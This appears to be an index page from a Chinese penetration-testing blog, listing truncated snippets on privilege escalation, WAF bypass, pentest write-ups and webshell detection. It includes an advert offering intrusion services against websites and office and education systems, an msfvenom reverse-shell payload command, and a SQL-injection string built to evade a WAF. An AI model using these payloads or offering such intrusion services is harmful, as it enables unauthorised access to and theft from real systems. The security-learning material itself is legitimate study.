-
[站外广告]业务列表介绍和一般分类
业务列表介绍和一般分类:类别:攻击入侵破解开发1:攻击业务订单:暂时取消所有此类业务订单[仅销售常规IDC流量]2:入侵业务清单:包括网站源代码,办公系统,黑色系统,教育系统等。[接受授权的业务] ...
-
Sqlserver提权
1、简介如果网站里面使用的数据库是sqlserver那么如果找到sa的密码,利用提权脚本,执行命令,但是不一定的系统权限,还要看管理员开始安装sqlserver的权限设置。2、查找帐号和密码web.configconfig.aspconn.aspxdatabase.aspx3、开启xp_cmd...
-
zend nc 提权
1、简介在php里面有一个扩展是zend这个是用解析phpzend脚本加密文件。如果服务器安装了zend如果ZendExtensionManager.dll权限可以修改,那就可以用其他dl替换这dll文件。查找ZendExtensionManager.dllC:\ZkeysSoft\Zen...
-
zend反弹shell提权
这篇是接着上篇内容所说。Zend_DLL_Hijacking.exe执行远控msfconsole生成反弹shell生成攻击载荷msfvenom-pwindows/meterpreter/reverse_tcplhost=192.168.0.106lport=12345-fexe&...
-
FileZilla 提权
1、简介FileZilla是一个ftp服务器,假如配置不严的,读取xml密码可以执行一些简答的命令默认安装目录C:\ProgramFiles\FileZillaServer\2、提权FileZillaServerInterface.xml<FileZ...
-
msf结合漏洞审计工具进行提权
1、windows补丁审计工具使用在终端下可以使用命令systeminfo来查看系统的一些补丁信息http://www.demo1.com/asp.aspx补丁检测Windows-Exploit-Suggesterhttps://github.com/GDSSecurity/Windows...
-
渗透测试工具实战技巧合集
最好的NMAP扫描策略#适用所有大小网络最好的nmap扫描策略#主机发现,生成存活主机列表$nmap-sn-T4-oGDiscovery.gnmap192.168.56.0/24$grep"Status:Up"Discovery.gnmap|cut-f2-...
-
最新过安全狗注入语句
union%23muxue%0Aselect%23mux%0A1,2,group_concat(table_name,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18frominformation_schema.tableswheretable_schema='j...
-
记一次阿里云主机泄露Access Key到Getshell
0x01前言此次渗透为一次授权渗透测试,门户网站找出了一堆不痛不痒的小漏洞,由于门户网站敏感特征太多而且也没什么特殊性就没有截图了,后台则是根据经验找出并非爆破目录,涉及太多敏感信息也省略了,我们就从后台开始。PS:本文仅用于技术讨论,严禁用于任何非法用途,违者后果自负。0x02正文拿到网站...
-
记一次不出网的渗透测试
前言周末时间中午吃饱喝足后,闲着无聊上线玩了几把游戏,听着音乐,本想周末就这样悠闲的过的,怎么老输,开始键盘侠上线,没办法,人菜又瘾大。PS:本文仅用于技术讨论,严禁用于非法用途,违者后果自负,与本站及作者无关。S2-046打点突然手机微信响了下,说有个测试,要开始干活。给一了个IP地址,先是进行...
-
细说渗透江湖之披荆斩棘
前言说来话长,在一个月黑风高的晚上,突然接到一个渗透任务,貌似还挺急,在客户充分授权的情况下,便连夜进行测试。由于本次渗透时间紧任务重,以拿权限为主,信息收集时需要格外仔细,端口、C段、指纹、路径、fofa、目录、github、网盘等等,有关信息进行收集,当然了403,404,nginx等页面也是...
-
前端JavaScript渗透测试步步为营
细心到极致方可不错失漏洞。事情起因在某次难度较高的众测项目中,笔者遇到了一个看起来”绝对安全的系统“,项目上线几天后此系统仍然没有被测试出漏洞,在没有系统功能、各种访问404的、没有测试账户的情况下,仍然揪出了隐藏在角落的漏洞,获得了高额赏金,算是在挖洞的道路上越走越远了,哈哈~本文分享在此漏洞挖掘...
-
包含文件结合phpinfo反弹交互shell
1.简介在PHP文件包含漏洞中,当我们找不到用于触发RCE的有效文件时,如果存在PHPINFO(它可以告诉我们临时文件的随机生成的文件名及其位置),我们可能可以包含一个临时文件来利用它。当向PHP发送POST请求并且请求包含一个文件块时,PHP会将所发送的文件保存到一个临时文件中(通常是/tmp/P...
-
漏洞及渗透练习平台 【大全】
WebGoat漏洞练习环境https://github.com/WebGoat/WebGoathttps://github.com/WebGoat/WebGoat-LegacyDamnVulnerableWebApplication(漏洞练习平台)https://github.com/Rando...
-
burpsuite 抓取 https ssl 数据包
burpsuite抓取httpsssl数据包火狐浏览器设置代理把ssl也勾上不然设置成功也抓不到包。打开burpsuite之后访问http:locahost:8080下载证书查看证书->导入证书记得把这个选项也要勾上这样就设置成功成功抓取https://a...
-
应急响应之如何发现隐藏的Webshell后门
如何在百万行代码里发现隐藏的后门试想一下,如果你的网站被入侵,攻击者留下隐藏的后门,你真的都可以找出来嘛?面对一个大中型的应用系统,数以百万级的代码行,是不可能做到每个文件每段代码进行手工检查的。即使是一款拥有99.9%的Webshell检出率的检测引擎,依然可能存在Webshell绕过的情况。另外...
-
渗透测试之登录点经验之谈
一个网站就可能存在不到一个登陆点,那么多个网站的登录点就更多,如何进入后台是一门相当有用的技术,登录后台能够发现更多的漏洞。PS:本文仅用于技术讨论,严禁用于任何非法用途,违者后果自负。一、逻辑问题由于程序员设计出现逻辑性的问题,导致我们暴力破解可以绕过逻辑来进行暴力破解,碰到实例有登录失败连续5次...
-
身份绕过漏洞session
session机制是一种服务器端的机制,服务器使用一种类似于散列表的结构(也可能就是使用散列表)来保存信息。当程序需要为某个客户端的请求创建一个session的时候,服务器首先检查这个客户端的请求里是否已包含了一个session标识-称为sessionid,如果已包含一个sessionid则说...